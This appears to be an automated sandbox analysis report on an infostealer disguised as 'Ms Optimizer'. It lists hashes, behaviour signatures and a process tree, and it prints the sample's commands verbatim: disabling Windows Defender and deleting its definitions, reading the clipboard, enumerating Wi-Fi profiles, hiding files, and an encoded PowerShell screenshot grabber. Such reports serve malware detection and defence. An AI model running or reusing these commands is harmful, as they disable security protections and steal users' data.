Analysis

  • max time kernel
    109s
  • max time network
    138s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01-01-2025 15:04

General

  • Target

    Ms Optimizer.rar

  • Size

    7.5MB

  • MD5

    24070930e012ed85eaecbf9cb60b2910

  • SHA1

    abe37ec45c9387538d93f9f3f24ce212e711f204

  • SHA256

    0ff7a5b5bedeac0e43dfc0779ba19d96357871631043d5b9243c24bc743c9029

  • SHA512

    176a59ecf6179de7c38f1c8d3d5a1901c514087c0fa6b06b865b3c72be1cfd9c34f82d0beb727db028e14dfa2d92b687bcacaa1e59be1a8ef4fceaf02681360e

  • SSDEEP

    196608:oyUrYorj3f/9LoEyOULkTS7ys3r3wb3IhGfLjSvx5:of9xDxULkTobuwqWv7

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 2 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 6 IoCs
  • Clipboard Data 1 TTPs 4 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 10 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 6 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.rar"
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe
        "C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4400
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2836
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:880
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4724
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3884
          • C:\Program Files\Windows Defender\MpCmdRun.exe
            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
            5⤵
            • Deletes Windows Defender Definitions
            PID:5084
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('REQUIREMENT NOT INSTALLED', 0, 'REQUIREMENT', 32+16);close()""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4492
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('REQUIREMENT NOT INSTALLED', 0, 'REQUIREMENT', 32+16);close()"
            5⤵
              PID:472
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2720
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:356
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4576
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3760
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1708
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              5⤵
                PID:3292
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1012
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                5⤵
                  PID:4700
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4192
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3204
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1724
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2076
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe""
                4⤵
                • Hide Artifacts: Hidden Files and Directories
                • Suspicious use of WriteProcessMemory
                PID:2552
                • C:\Windows\system32\attrib.exe
                  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:1564
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎  ‎​.scr'"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:64
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎  ‎​.scr'
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4392
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3136
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  PID:2104
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4840
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  PID:1620
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                4⤵
                  PID:4496
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4980
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  4⤵
                  • Clipboard Data
                  PID:2496
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    5⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3768
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  4⤵
                    PID:3296
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      5⤵
                      • Enumerates processes with tasklist
                      PID:3788
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    4⤵
                      PID:4836
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        5⤵
                          PID:4152
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        4⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:5068
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          5⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:5000
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        4⤵
                          PID:4804
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            5⤵
                            • Gathers system information
                            PID:396
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          4⤵
                            PID:3612
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              5⤵
                                PID:2552
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              4⤵
                                PID:828
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  5⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2500
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a1i2vdwq\a1i2vdwq.cmdline"
                                    6⤵
                                      PID:4028
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A0F.tmp" "c:\Users\Admin\AppData\Local\Temp\a1i2vdwq\CSC6DDE5CD18957479FB6E423A864D8B69E.TMP"
                                        7⤵
                                          PID:220
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    4⤵
                                      PID:2668
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        5⤵
                                          PID:3184
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        4⤵
                                          PID:2836
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            5⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:1072
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          4⤵
                                            PID:1736
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              5⤵
                                                PID:4576
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              4⤵
                                                PID:2872
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  5⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:3324
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                4⤵
                                                  PID:2120
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    5⤵
                                                      PID:4836
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      5⤵
                                                        PID:4036
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      4⤵
                                                        PID:560
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          5⤵
                                                          • Enumerates processes with tasklist
                                                          PID:5072
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        4⤵
                                                          PID:2080
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            5⤵
                                                              PID:4364
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            4⤵
                                                              PID:1768
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                5⤵
                                                                  PID:2920
                                                              • C:\Windows\system32\cmd.exe
